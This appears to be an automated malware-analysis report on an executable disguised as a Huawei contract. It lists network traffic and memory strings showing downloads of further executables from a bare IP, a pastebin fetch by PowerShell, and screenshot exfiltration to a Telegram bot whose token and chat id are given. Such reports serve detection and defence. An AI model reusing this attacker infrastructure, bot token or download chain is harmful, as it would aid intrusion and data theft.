Source: unknown | TCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /raw/WHKzW2nr HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: pastebin.com Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 Host: api.ipify.org
Source: global traffic | HTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1 Host: ip-api.com
Source: global traffic | HTTP traffic detected: GET /Team/BILLI.exe HTTP/1.1 Host: 89.23.97.214
Source: global traffic | HTTP traffic detected: GET /Team/32cv.exe HTTP/1.1 Host: 89.23.97.214
Source: global traffic | HTTP traffic detected: GET /Team/BILLI.exe HTTP/1.1 Host: 89.23.97.214
Source: global traffic | HTTP traffic detected: GET /Team/32cv.exe HTTP/1.1 Host: 89.23.97.214
Source: global traffic | HTTP traffic detected: GET /Team/32cv.exe HTTP/1.1 Host: 89.23.97.214
Source: global traffic | HTTP traffic detected: GET /Team/BILLI.exe HTTP/1.1 Host: 89.23.97.214
Source: global traffic | HTTP traffic detected: GET /Team/32cv.exe HTTP/1.1 Host: 89.23.97.214
Source: global traffic | HTTP traffic detected: GET /Team/BILLI.exe HTTP/1.1 Host: 89.23.97.214
Source: global traffic | DNS traffic detected: DNS query: pastebin.com
Source: global traffic | DNS traffic detected: DNS query: api.ipify.org
Source: global traffic | DNS traffic detected: DNS query: ip-api.com
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: unknown | HTTP traffic detected: POST /bot7529774093:AAF3iNvYZOShB_j-3WVxQo0gVFdczpL8Wu8/sendPhoto?chat_id=-4642404996 HTTP/1.1 Host: api.telegram.org Content-Type: multipart/form-data; boundary="e4a0611f-b7c4-4266-9d16-9a0547683bdd" Content-Length: 694321
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000000.2141507633.00007FF77A21D000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: http://.css
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000000.2141507633.00007FF77A21D000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: http://.jpg
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.0000027754020000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://89.23.97.214/Team/32cv.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.00000277540B9000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://89.23.97.214/Team/32cv.exe:
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.0000027754020000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://89.23.97.214/Team/BILLI.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.00000277540AB000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://89.23.97.214/Team/BILLI.exe:
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.0000027754000000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://89.23.97.214/Team/BILLI.exehttp://89.23.97.214/Team/32cv.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.0000027754083000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://89.23.97.214:80/
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.0000027754020000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://api.ipify.org/
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.0000027754020000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://api.ipify.org:80/
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.0000027754000000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://api.ipify.orgnotification_sent.flag
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.0000027754020000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://api.ipify.orgx
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.00000277540B9000.00000004.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.0000027754067000.00000004.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.00000277540AE000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.org:443/
Source: powershell.exe, 00000002.00000002.2247608619.0000016DD6CFB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.m
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250073254.000002B7E9992000.00000020.00001000.00020000.00000000.sdmp | String found in binary or memory: http://exslt.org/common
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000000.2141507633.00007FF77A21D000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: http://html4/loose.dtd
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.0000027754000000.00000004.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.0000027754039000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com/json/
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.0000027754039000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com/json/8.46.123.189x
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.0000027754000000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com/json/P
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.0000027754043000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com:80/
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242777428.000002B7EB847000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242862693.000002B7EB847000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242878256.000002B7EB847000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242759471.000002B7EB846000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242660824.000002B7EB831000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.a.0/sTy
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242777428.000002B7EB847000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242862693.000002B7EB847000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242878256.000002B7EB847000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242759471.000002B7EB846000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242660824.000002B7EB831000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.c.0/ti
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242777428.000002B7EB847000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242862693.000002B7EB847000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242878256.000002B7EB847000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242759471.000002B7EB846000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242660824.000002B7EB831000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.hotosh
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242777428.000002B7EB847000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242862693.000002B7EB847000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242878256.000002B7EB847000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242759471.000002B7EB846000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242660824.000002B7EB831000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.adoraw-se
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242777428.000002B7EB847000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242862693.000002B7EB847000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242878256.000002B7EB847000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242759471.000002B7EB846000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242660824.000002B7EB831000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.photo/
Source: powershell.exe, 00000002.00000002.2229378708.0000016DCE5BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2266658120.00000224101B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2426442069.0000020D1833D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000004.00000002.2198121281.00000224015DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com
Source: powershell.exe, 00000009.00000002.2324358449.0000020D084F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.0000027754043000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249216693.000002B7E9390000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247740081.000002B7E6AF0000.00000004.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249306930.000002B7E9471000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.0000027754043000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/NETdesign.Plugin.Notifer
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249216693.000002B7E9390000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249306930.000002B7E9471000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/System.IO
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249216693.000002B7E9390000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249306930.000002B7E9471000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/System.Runtime.Serialization
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249216693.000002B7E9390000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249306930.000002B7E9471000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/System.Xml
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249216693.000002B7E9390000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249306930.000002B7E9471000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/System.Xml.Linq
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249216693.000002B7E9390000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249306930.000002B7E9471000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/SystemV
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249216693.000002B7E9390000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249306930.000002B7E9471000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/SystemY
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249216693.000002B7E9390000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249306930.000002B7E9471000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/dhttp://schemas.datacontract.org/2004/07/System.XmlRhttp://w
Source: powershell.exe, 00000002.00000002.2193285575.0000016DBE779000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2324358449.0000020D084F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245831020.00000277513A1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245856993.00000277513B0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245831020.00000277513A1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245856993.00000277513B0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245831020.00000277513A1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245856993.00000277513B0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245831020.00000277513A1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245786403.0000027751380000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245744128.0000027751351000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245856993.00000277513B0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245831020.00000277513A1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245856993.00000277513B0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245831020.00000277513A1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245856993.00000277513B0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/locality
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245831020.00000277513A1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245856993.00000277513B0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247740081.000002B7E6AF0000.00000004.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245786403.0000027751380000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245744128.0000027751351000.00000020.00001000.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2193285575.0000016DBE551000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2198121281.0000022400001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2324358449.0000020D082D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245831020.00000277513A1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245856993.00000277513B0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245831020.00000277513A1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245856993.00000277513B0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245831020.00000277513A1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245856993.00000277513B0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245831020.00000277513A1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245856993.00000277513B0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245831020.00000277513A1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245856993.00000277513B0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245831020.00000277513A1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245856993.00000277513B0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245831020.00000277513A1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245856993.00000277513B0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamevhttp://schemas.xmlsoap.o
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250073254.000002B7E9992000.00000020.00001000.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2193285575.0000016DBE779000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2324358449.0000020D084F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000009.00000002.2324358449.0000020D084F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.2247608619.0000016DD6CFB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2450396016.0000020D20A67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247422973.000002B7E6661000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247040069.000002B7E60D0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://aka.ms/GlobalizationInvariantMode
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247422973.000002B7E6661000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250716435.000002B7E9DC1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250642336.000002B7E9D70000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247422973.000002B7E67C3000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247040069.000002B7E60D0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://aka.ms/binaryformatter
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000000.2141507633.00007FF77A21D000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/dotnet-core-applaunch?
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000000.2141507633.00007FF77A21D000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/dotnet-core-applaunch?GetWindowsDirectory
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247422973.000002B7E6661000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247422973.000002B7E67C3000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247040069.000002B7E60D0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://aka.ms/dotnet-illink/com
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247422973.000002B7E6661000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247422973.000002B7E67C3000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247040069.000002B7E60D0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://aka.ms/dotnet-illink/nativehost
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247422973.000002B7E67C3000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/dotnet-illink/nativehostt
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248575013.000002B7E9051000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/dotnet-warnings/
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000000.2141507633.00007FF77A21D000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/dotnet/app-launch-failed
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000000.2141507633.00007FF77A21D000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/dotnet/download
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000000.2141507633.00007FF77A21D000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/dotnet/download%s%sInstall
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000000.2141507633.00007FF77A21D000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/dotnet/info
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000000.2141507633.00007FF77A21D000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/dotnet/sdk-not-foundProbing
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247040069.000002B7E60D0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibility
Source: powershell.exe, 00000002.00000002.2193285575.0000016DBE551000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2198121281.0000022400001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2324358449.0000020D082D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250716435.000002B7E9DC1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250642336.000002B7E9D70000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://aka.ms/serializationformat-binary-obsolete
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251017895.000002B7E9F11000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250944802.000002B7E9E90000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://aka.ms/systemdrawingnonwindows
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251680767.000002B7EA5E6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://aka.ms/winforms-warnings/
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.00000277540AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7529774093:AAF3iNvYZOShB_j-3WVxQo0gVFdczpL8Wu8/sendMessage
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.0000027754000000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7529774093:AAF3iNvYZOShB_j-3WVxQo0gVFdczpL8Wu8/sendMessagechat_id-464240
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.0000027754067000.00000004.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.0000027754000000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7529774093:AAF3iNvYZOShB_j-3WVxQo0gVFdczpL8Wu8/sendPhoto?chat_id=-464240
Source: powershell.exe, 00000009.00000002.2426442069.0000020D1833D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000009.00000002.2426442069.0000020D1833D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000009.00000002.2426442069.0000020D1833D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000009.00000002.2324358449.0000020D084F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250422129.000002B7E9C80000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250523289.000002B7E9CE1000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/linker/issues/2715.
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245966712.00000277513E1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248122759.000002B7E8E40000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249567499.000002B7E95B1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249474322.000002B7E9581000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249010025.000002B7E9301000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249525013.000002B7E95A0000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251410435.000002B7EA1B1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246893106.000002B7E6011000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248897242.000002B7E9280000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249747447.000002B7E9640000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245924097.00000277513D0000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248833493.000002B7E91C1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245331226.0000027751290000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249503089.000002B7E9590000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248611872.000002B7E90A0000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248518064.000002B7E9000000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247337256.000002B7E6560000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250591766.000002B7E9D51000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251506804.000002B7EA1F1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 